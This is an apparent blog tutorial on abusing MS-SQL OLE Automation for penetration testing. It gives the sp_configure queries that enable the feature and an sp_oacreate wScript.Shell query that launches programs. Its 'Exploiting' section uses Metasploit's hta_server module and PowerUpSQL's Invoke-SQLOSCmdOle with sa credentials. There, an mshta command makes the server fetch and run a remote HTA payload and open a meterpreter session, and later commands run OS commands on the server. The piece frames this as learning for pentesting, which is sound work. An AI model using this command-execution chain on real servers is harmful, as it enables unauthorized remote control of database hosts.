OLE automation is a process through which an application can access and manipulate the implied objects in other applications. Hence, in this article, we will how to use OLE automation to our benefit.
Table of content:
·
What
is OLE Automation?
·
What
are Facets?
·
How
to enable OLE Automation?
·
Exploiting
OLE Automation
What is OLE Automation?
OLE stands for Object Linking and Embedding. Microsoft
develops this technology to make it easier for applications to share their
data. Therefore, automation enables an application to manipulate objects that
are implemented in other applications. This automation server unveils its
features via COM interfaces; for the different applications to read them, it
further helps them automate their properties by retrieving objects and using
their services.
What are Facets?
Facets help to manage databases through their
own set of policy-based functions. When it comes to MS-SQL, it has premeditated
Facets. For instance, the surface area configuration facet construes the
properties that are off by default. This function comes in handy when you have
multiple SQL environments. Here, you can configure a Facet in one server's
environment and copy the facet to another SQL environment by importing the
copied file into an instance of the server as a policy.
How to enable OLE automation?
On a newly installed MS-SQL server, many
instances are disabled by default. And this enabling or disabling of the
functions provided by the SQL server can be done through Facets. There are two
methods to allow OLE automation.
The first method is to enable it from SQL
Server Management Studio. Open the studio and right-click on the server. A
drop-down menu will appear. From this menu, click on Facets. As shown in the
image below:
A dialogue box will open, which will provide
you with a facet drop-down list. From this drop-down list, choose Surface Area
Configuration, just as shown in the image below:
Once you choose the Surface Area Configuration,
then you can select the value true for OleAutomationEnabled from
the Facet properties section as shown in the image below:
After following the above steps, click on the 'ok'
button in the dialogue box to Enable OLE Automation.
The second method to enable OLE automation is
via SQL queries. Before we move on to the queries, let's make one thing clear:
if the value for OLE automation is 1, it is enabled. Similarly, if the value is
set to 0, then it means that the OLE automation is disabled.
So, to confirm whether the Ole Automation is
enabled or disabled, we will use the following query:
EXEC
sp_configure 'Ole Automation Procedures';
GO
And as you can see in the image above, the config_value
and run_value are 0; that means the OLE Automation is disabled. Now, to
enable it to write the following query:
sp_configure
'show advanced options', 1;
GO
RECONFIGURE;
GO
sp_configure
'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO
Once the query is executed, you can use the
first query again to check the status of OLE automation. As you can see in the
image below, the said query will change the value from 0 to 1 and enable the
OLE automation in the process.
Exploiting OLE Automation
Now that we have activated OLE automation, we
can execute a little query to run any application. For instance, in the image
below, we are entering a query for it to run the calculator. And as you can
observe, the query is using COM to call upon the application. The query is :
DECLARE @output INT
DECLARE @ProgramToRun VARCHAR(255)
SET @ProgramToRun = ‘Run(“calc.exe”)’
EXEC sp_oacreate ‘wScript.Shell’, @output out
EXEC sp_oamethod @output, @ProgramToRun
EXEC sp_oadestroy @output
Once you run the above query, it will run the
calculator application. So using this logic, we will now try and exploit this
OLE automation to our benefit via Metasploit and PowerUpSQL tool. Open
Metasploit and run the following set of commands to generate a hta URL, which
one executed will provide us with a Metasploit session.
use exploitwindows/misc/hta_server
set srvhost *localhost*
exploit
As expected, the above exploit generated a URL
for us. Now, go to PowerShell and use the following set of commands to get the
said session:
cd PowerUpSQL-master
powershell
powershell -ep bypass
Import-Module .\PowerUpSQL.ps1
Invoke-SQLOSCmdOle -Username sa -Password
Password@1 -Instance WIN-P83OS778EQK\SQLEXPRESS –Command "mshta.exe
http://192.168.1.2:8080/pr2e96MyVedJ6.hta" -Verbose
Once the above commands are executed, you will
have your session as shown in the image below:
Note: you will only get a meterpreter session
if you have access to the username and password of the server.
You can also run any command compatible with
the server through PowerShell, as shown in the image below. Here we ran
ipconfig command to know the IP of the server. The command is:
Invoke-SQLOSCmdOle -Username sa -Password
Password@1 -Instance WIN-P83OS778EQK\SQLEXPRESS –Command ipconfig -Verbose
Executing the above command will save the
desired result in a text file in the temp folder, as shown in the image below:
This way, you can exploit or manipulate the OLE
Automation to your desires. Such methods go a long way in learning as knowledge
of such things helps in penetration testing of a
MS-SQL server environment.
0 comments:
Post a Comment